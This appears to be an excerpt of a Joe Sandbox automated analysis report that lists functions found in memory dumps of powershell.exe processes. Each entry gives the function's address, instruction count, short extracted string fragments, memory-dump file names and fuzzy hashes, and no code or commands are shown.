Function 0755030A Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4']q, xrefs: 0755037F
$]q, xrefs: 0755035E
4']q, xrefs: 07550373
$]q, xrefs: 07550352

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 313253b370e1cc2cf496c9d9db2ac54204988b49862a077ae6317a16723c6c49
Instruction ID: 35c42f0c59f2f243e1e8727c6c29e7ee26f8b592230394d5c65b572239314563
Opcode Fuzzy Hash: 313253b370e1cc2cf496c9d9db2ac54204988b49862a077ae6317a16723c6c49
Instruction Fuzzy Hash: CE01DF6170A3899FC72B123819301A52BF6AFC3A1072B45D7C885CB296C9158C4683A7

Analysis Process: powershell.exePID: 1412, Parent PID: 6592COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 04DBB490 Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67d46f188a8b27a6fb62e0e2490d26ee6d0ffb3905d1c375293f983ba7a708d
Instruction ID: a0cb94de01356d3c828edc8975603d001c4725869a42c17be448b0faeb07e427
Opcode Fuzzy Hash: c67d46f188a8b27a6fb62e0e2490d26ee6d0ffb3905d1c375293f983ba7a708d
Instruction Fuzzy Hash: DE914270B006199BEB19DFB484105EEBBF2EFC5604B00C92DD55AAB354DF34AD068BD6

Function 04DBB4A0 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3182a2f23783a7e00a0f81fe491f88969a045aca513b650561d2b0e6423937d
Instruction ID: 0a790bfef2d584202dbe63ff61c3257120bd4e9df729500a1b0e99c96c9107e9
Opcode Fuzzy Hash: d3182a2f23783a7e00a0f81fe491f88969a045aca513b650561d2b0e6423937d
Instruction Fuzzy Hash: 45913071B006199BEB19EFB484105AEBBF3EFC4604B00C92DD55AAB354DF34AD068BD6

Function 07C72308 Relevance: 14.4, Strings: 11, Instructions: 638COMMON

Download Yara Rule

Strings

rWl, xrefs: 07C7254F
|,!k, xrefs: 07C725DB
JXl, xrefs: 07C725EA
rWl, xrefs: 07C72559
JXl, xrefs: 07C725F6
JXl, xrefs: 07C7237F
JXl, xrefs: 07C7259E
JXl, xrefs: 07C723C5
4']q, xrefs: 07C7260D
JXl, xrefs: 07C723D1
4']q, xrefs: 07C72619

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$|,!k$JXl$JXl$JXl$JXl$JXl$JXl$rWl$rWl
API String ID: 0-1009563007
Opcode ID: 9a5b8b7123e75e910be41d36abbc2d3591090133242f5c6c36a26f2b9f9fb99e
Instruction ID: 473def7116ec8143be0f1d513eecb828eda24cf75281d8c9c2c6f6b28f207422
Opcode Fuzzy Hash: 9a5b8b7123e75e910be41d36abbc2d3591090133242f5c6c36a26f2b9f9fb99e
Instruction Fuzzy Hash: B42204B1B00206DFCB259B69C8916AABBF6FF85311F04807AD945CF251DF35CA45CBA1

Function 07C73CE8 Relevance: 5.6, Strings: 4, Instructions: 568
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 07C74026
4']q, xrefs: 07C74180
4']q, xrefs: 07C7418A
4']q, xrefs: 07C74030

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 4c845203a1a8564e5dcad4dd4db9c4dcb4709b0d3fc3838686ecc57f18bb5321
Instruction ID: 470f28570b8620f1d34c0e642b71af32919919151811da34249afb9fbe64915a
Opcode Fuzzy Hash: 4c845203a1a8564e5dcad4dd4db9c4dcb4709b0d3fc3838686ecc57f18bb5321
Instruction Fuzzy Hash: 7A1269B17002918FCB299B69D8517AABBE6DFC1311F1484BAD905CB391DF36CA41CBA1

Function 08DE64A8 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 08DE6512

Memory Dump Source

Source File: 00000007.00000002.2169061150.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8de0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 5f75f9ed7d4790233142119661fdb82765cd81dd946dca8918220a9a4004864b
Instruction ID: 9ffe2f292650e90519da3dca6c38c7d126388b21761af113df831a290e8bb844
Opcode Fuzzy Hash: 5f75f9ed7d4790233142119661fdb82765cd81dd946dca8918220a9a4004864b
Instruction Fuzzy Hash: 371125B19002488FCB10EF9ED544BAEFBF8EF59320F148459E518A7310C778A944CFA1

Function 08DE64B0 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 08DE6512

Memory Dump Source

Source File: 00000007.00000002.2169061150.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8de0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: c4e403d6f53636f4e8eef888f47280d196144ef475d2db1e8627ebb79031eb83
Instruction ID: 1c5fc74ef36b5d38f03f74d483a0a18bbae194d2fb4810f911d51cd282773ee5
Opcode Fuzzy Hash: c4e403d6f53636f4e8eef888f47280d196144ef475d2db1e8627ebb79031eb83
Instruction Fuzzy Hash: 361106B59006488FCB10DF9AD544B9EFFF8EF58324F148459D519A7310C778A944CFA1

Function 04DB6FC8 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 04DB70ED

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: bcde8b5d04b03b7e699721ef13abc8de4a65f6df931b91cc0359cfdd8019a791
Instruction ID: e59ac27b95b2a042551224edc9fe9163740347fd8512e05a7535d4a98e4507bc
Opcode Fuzzy Hash: bcde8b5d04b03b7e699721ef13abc8de4a65f6df931b91cc0359cfdd8019a791
Instruction Fuzzy Hash: 1F412834B04605CFDB04DFA8C554AAABBF2EFCD311F154099E846AB3A1DA35EC01CBA0

Function 04DBAFA8 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&]q, xrefs: 04DBAFCA

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: (&]q
API String ID: 0-1343553580
Opcode ID: e860de39fc0d806a0b9fcf638f9809acc7970fb4861180557ebbf549ce625148
Instruction ID: 7d00dc5aba90dbbbe6cd3d6fadcd5a290fefb35c0695344a5daf178fe904e7a5
Opcode Fuzzy Hash: e860de39fc0d806a0b9fcf638f9809acc7970fb4861180557ebbf549ce625148
Instruction Fuzzy Hash: D621AC71A042588FCB14DFAED444AEEBFF5EF89320F14846AD419A7350CA74A905CBE5

Function 04DBD280 Relevance: 1.3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

</Ll, xrefs: 04DBD2D2

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: </Ll
API String ID: 0-2959127714
Opcode ID: b2b286ccb22c7e62dd9fc6cafac2d801a0b3d56b9616f66229a9df0492d8a01a
Instruction ID: 5480194a2b57f9f316f4c3897ffa0428851f5fea903303b96741a7ffc43d634a
Opcode Fuzzy Hash: b2b286ccb22c7e62dd9fc6cafac2d801a0b3d56b9616f66229a9df0492d8a01a
Instruction Fuzzy Hash: B5219F30304344DFD705DB69D980D9ABBEAEF8A25470485A9D44ACF366DB35EC09CBA1

Function 04DBD290 Relevance: 1.3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

</Ll, xrefs: 04DBD2D2

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: </Ll
API String ID: 0-2959127714
Opcode ID: e6bef5649fc8b335698afb7f6b71279df24b70abaa9e49fe94d5c39765134d49
Instruction ID: 3fe7ce05fa0b8f77b5a10b25337e1f3d47bd70b5783b9eedf4a030b335056100
Opcode Fuzzy Hash: e6bef5649fc8b335698afb7f6b71279df24b70abaa9e49fe94d5c39765134d49
Instruction Fuzzy Hash: 002198303003049FDB05DF69D880E9ABBEAFF89218B00856DE44ACB325DB35F805CB90

Function 04DB29F0 Relevance: .2, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 594f1c5d42ca82666934063ad727629c38953aff75e3be82fc794a3da23977ba
Instruction ID: e2d0e5851cfa218a9cdc99827a5c38df099bf994964c1cd496536661b0db7820
Opcode Fuzzy Hash: 594f1c5d42ca82666934063ad727629c38953aff75e3be82fc794a3da23977ba
Instruction Fuzzy Hash: 60916875A00209DFCB15CF58C5D89AAFBB1FF48310B258699D856AB365C735FC81CBA0

Function 04DB7728 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45a344f00dd7998ac92a467aab12909a4b1e8b84c4382f5faa7f9e104c3b13b
Instruction ID: 0c860da148ac7802a94d2ca779fcfb249546ee7f73951f73866e9b37b36b06e9
Opcode Fuzzy Hash: d45a344f00dd7998ac92a467aab12909a4b1e8b84c4382f5faa7f9e104c3b13b
Instruction Fuzzy Hash: 1951BF35704205DFD705DB69D844A6A7BEAFFC8314F1484A9E84ACB362EB35EC01CBA0

Function 04DBBAD0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 295c6899b1dd606fd7af94a254a48bca026d8d8fd1e8509d7f001497ad4b26eb
Instruction ID: b0abb36c4127b049517030dde98ebd5514705f7980cc7302d2d4614244c964fd
Opcode Fuzzy Hash: 295c6899b1dd606fd7af94a254a48bca026d8d8fd1e8509d7f001497ad4b26eb
Instruction Fuzzy Hash: CE61E571E00249DFDB15DFA9D584ADDFBF5FF88310F14812AE819AB264EB34A845CB90

Function 04DBBAC0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a2b6219e0ea855cfee41070e66547dea7804ce814cc676c28ca0c3cae8549e
Instruction ID: 7b527d32d86a2d77cbd12c33f7f0256733f971936a5dff4b2d96d9678d8e00be
Opcode Fuzzy Hash: b8a2b6219e0ea855cfee41070e66547dea7804ce814cc676c28ca0c3cae8549e
Instruction Fuzzy Hash: FA51D771E01248DFCB15DFA9D584ADDBBF5FF88310F14806AE819AB364EB34A845CB94

Function 04DB6FA0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d979beb4bbeb401d183186baba3d3f6d3fbf9d808f5b54bf9566b47ab6078896
Instruction ID: 9045d0e96cde4c979213f73fc2fe9de97b07ac9afa71fe7a7ce9dd57c6d5f39a
Opcode Fuzzy Hash: d979beb4bbeb401d183186baba3d3f6d3fbf9d808f5b54bf9566b47ab6078896
Instruction Fuzzy Hash: 6E418174B042458FDB05CF64C954AEE7FF1AFCA305F15409AD486AB362CB22DC05CBA1

Function 07C73CCD Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0afa86173ab16dd3faf5ed1a0d6a14fd1ee21198c5cfb13e8fe3e36d4e51c978
Instruction ID: e33fa90662c6abe1cca5324add434de6c67b523112e11d5301af18eee2765f6e
Opcode Fuzzy Hash: 0afa86173ab16dd3faf5ed1a0d6a14fd1ee21198c5cfb13e8fe3e36d4e51c978
Instruction Fuzzy Hash: 564127F0A102C2CBCB358F25C9C1AAA7BE29F81650F1484A5D9049F356DF35DE85DBB2

Function 04DB2B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5723356b7e33e35fc266baf726b12e3a3d0dcbfaa4b9db303f6a07c9bb44710e
Instruction ID: 3d701bd65acbef9748c4e2d93ac9ddc61832ab87acbbfc5349f0e14c9ce8fd65
Opcode Fuzzy Hash: 5723356b7e33e35fc266baf726b12e3a3d0dcbfaa4b9db303f6a07c9bb44710e
Instruction Fuzzy Hash: 70412775A00509DFCB0ACF58C5989EAFBB1FF48310B158699D856AB364C732FC91CBA4

Function 04DBC398 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d842b0753716506c1012921e6dedbf34e85d2fcf0f7929ac12dbf4f3ae43c14
Instruction ID: 1bec2dca60448361bae9c829d7fa18aec8dcb53c477fb1f961c5e78c168512a0
Opcode Fuzzy Hash: 5d842b0753716506c1012921e6dedbf34e85d2fcf0f7929ac12dbf4f3ae43c14
Instruction Fuzzy Hash: A9318B313016019FD709EB78E844B9AB7AAEFC4215F048139D60ACB365EF75EC49CBA1

Function 04DBAE70 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd93868be6d34ce7eafcf1d84926574b0c04ac728663595d909b697bffbc0fb7
Instruction ID: 4fa1afa7d0920d0968e08e51500f89c058d8a440a32edad33987c322ed1e9344
Opcode Fuzzy Hash: cd93868be6d34ce7eafcf1d84926574b0c04ac728663595d909b697bffbc0fb7
Instruction Fuzzy Hash: 63314F70B012099FDB04DFA9D5947EEBBF6EF88344F148029E446EB364EB749C058B95

Function 04DBDFC8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23fcfc27e55c2b8bec95c4e7c3737acc2052f329597133f0248efcf45200da59
Instruction ID: 4b65a0f1a35dcf8f379275c463e0a3ff3f37a2c67c01a48d210f4a866e988386
Opcode Fuzzy Hash: 23fcfc27e55c2b8bec95c4e7c3737acc2052f329597133f0248efcf45200da59
Instruction Fuzzy Hash: B1314734A00204CFCB14DF69D458AAEBBF2FF89214F154569D806EB3A1DF35AC85CB91

Function 04DBAE80 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3403be3a4c6f3de6127d19eb9dc7301d77fb2742d1135322511ab10d98a60e4
Instruction ID: ba09e8f762b692be9e868d8a851a4a8dc7c2af04f2a39f47920fb7c51c245901
Opcode Fuzzy Hash: a3403be3a4c6f3de6127d19eb9dc7301d77fb2742d1135322511ab10d98a60e4
Instruction Fuzzy Hash: E7314D70B002099FDB04DFA9D5947EEBBF6EF88340F108029E846EB354EA349C058BA5

Function 04DBAD38 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc997ca95738d9f17e56dd344a4e251617446ca48357182ae8c738ae14fe553b
Instruction ID: ae2e83ff038ddbb5e4aff774dd15e1840b73d0cd70f4d6e7be2186c564709738
Opcode Fuzzy Hash: bc997ca95738d9f17e56dd344a4e251617446ca48357182ae8c738ae14fe553b
Instruction Fuzzy Hash: 6931D2B0A002499FEB01EFA4D454AAEBBB3EF84304F1084A9D505AB3A0CB38AC41CB51

Function 04DBAD48 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4ab9c59d10d1fced0e8bd4baca80b41a460173af49bd2a6cc7ce74196755e2
Instruction ID: 50550e433d4ef8edfcd7cf04335ce043a3c616e906248f783d26ce5f851d9591
Opcode Fuzzy Hash: bb4ab9c59d10d1fced0e8bd4baca80b41a460173af49bd2a6cc7ce74196755e2
Instruction Fuzzy Hash: B5318474A402099FEB04EFA4D454AAEBBB7EF84304F108469D915AB3A4DB34ED418F95

Function 04DBDFD8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da624abfa83e960837977eeb6b14102b88072c792251f600f82e1f3e31a68c47
Instruction ID: 28e70d40412f88210e639621e534ef0e592bd9c1b8a0009e8a3a69ecb11fb533
Opcode Fuzzy Hash: da624abfa83e960837977eeb6b14102b88072c792251f600f82e1f3e31a68c47
Instruction Fuzzy Hash: 24311474A006048FCB14DF69D458AAEBBF2EF88214F054569D806EB3A1DF75AC85CB91

Function 04C5F3D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150134360.0000000004C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e2c07ae28541f495ce7fbef3cd1b0588fe4c5a961f8bd8a4bce08fa6ec59ef
Instruction ID: 57be41db16833d838f5113380f993c85367318b13a589b20a608861977957657
Opcode Fuzzy Hash: 77e2c07ae28541f495ce7fbef3cd1b0588fe4c5a961f8bd8a4bce08fa6ec59ef
Instruction Fuzzy Hash: 8321F771600200DFDF09CF54D9C0B1ABF66FB88314F24C5ADED090A266C33AE496DBA5

Function 04DB93F8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3880646f833e9c6df27cd75a55f486fa88e3a189b530bd684a36a5168e83d907
Instruction ID: ded8994432a8e752fefc43353fd59570357c91030b8bf0daf2d9ed3b58daf5b9
Opcode Fuzzy Hash: 3880646f833e9c6df27cd75a55f486fa88e3a189b530bd684a36a5168e83d907
Instruction Fuzzy Hash: A5316AB49053848EDB60CF6AC0887CABFF2EF89310F18C09DD59E9B215D674A445CBA5

Function 07C72700 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0c2cab3536fceac2980513458f47ac321197f46d474e31bc020e9151591ec7
Instruction ID: 4b00857698ed672df5000a560af7b011f8cfb64a47c7682366953639a481f3ea
Opcode Fuzzy Hash: 2a0c2cab3536fceac2980513458f47ac321197f46d474e31bc020e9151591ec7
Instruction Fuzzy Hash: BD21AEB6A00206DFDB20CE6AC6C0B6577F5FB45321F048066E8089F251CB35DA84CBA1

Function 04C5F02C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150134360.0000000004C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32a90f1b064106aa0f57ec48ed0dd0c87014d87da9b1a12807c56cfbbd43aa8
Instruction ID: 5445d6f464334b0a58e9075c04b9aeaf973898dbc91cadd9540c99d1234bd07c
Opcode Fuzzy Hash: e32a90f1b064106aa0f57ec48ed0dd0c87014d87da9b1a12807c56cfbbd43aa8
Instruction Fuzzy Hash: FF213775604200DFCB18DF24C9C0B1ABF66FB84314F28C56DDE094B266C33AE486CB61

Function 04DB9408 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5727f3933285ef0007ea91f5276e236ef601205e80542ca9dd5edbfdb966dce
Instruction ID: a2578fb8c8d9326b10f0e0d3b3e1ca8e7883bca12dcbe041a06ee9cb67b51dca
Opcode Fuzzy Hash: c5727f3933285ef0007ea91f5276e236ef601205e80542ca9dd5edbfdb966dce
Instruction Fuzzy Hash: E52178B49053848EDB60CF6AC0887CAFBF2FB88310F28C059D99E97205D774A4808BA5

Function 04DB7664 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d2bc236390a5e9e123f2eb991d42408bbe16b8cd8d746271e4bd32c1e8dea6
Instruction ID: a6ce03c7d0bfb4a8d5a1d234ca42806c9c7bf63fd269979a7c2d3cfd97ddebd6
Opcode Fuzzy Hash: 90d2bc236390a5e9e123f2eb991d42408bbe16b8cd8d746271e4bd32c1e8dea6
Instruction Fuzzy Hash: 63112E36B00118CFCB04DBACE9409EE77F6FBC8255B1440A5E90ADB325DB34EC028B90

Function 04DBE298 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38aa3408d6a92f490f0ee04d5b77163b8de53a430a6550a167146883ea8c373
Instruction ID: 10d31627e3f6c91f1b618fefec4c564a55aa889f13f3a84e261013390dd0b6b5
Opcode Fuzzy Hash: b38aa3408d6a92f490f0ee04d5b77163b8de53a430a6550a167146883ea8c373
Instruction Fuzzy Hash: C0219D71805389CFDB11CFA9C5047DABFF4EF4A310F28809ED088A7251D738A944CBA1

Function 04C5F3D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150134360.0000000004C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction ID: a1427360f5eed6e5e0fb13b1c5cbcf068c20348e1b3929b983264540fe608c7c
Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction Fuzzy Hash: 1F2158765042409FCB0ACF10D9C4B16BB62FB88214F24C5A9ED494A666C33AD5AACBA1

Function 04DBDCE1 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0aa3aae095b4e5e47db4ce252d8c4a0e5d0fce1ce381dec517bcc1b3954334
Instruction ID: c7628feb12052c799012edde85a784eb03acd00d4cdf1bb984dd176a5da0ce93
Opcode Fuzzy Hash: da0aa3aae095b4e5e47db4ce252d8c4a0e5d0fce1ce381dec517bcc1b3954334
Instruction Fuzzy Hash: E3110835B05184DFCB169778D8049ECBFB2DF99221B0444BAD4C79B362D6219C15CBE1

Function 04C5F027 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2150134360.0000000004C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
Instruction ID: 9ade3e098e9bf07a65e9b4ee2ae210827de21e03b6c54158febf12b5e0964ff3
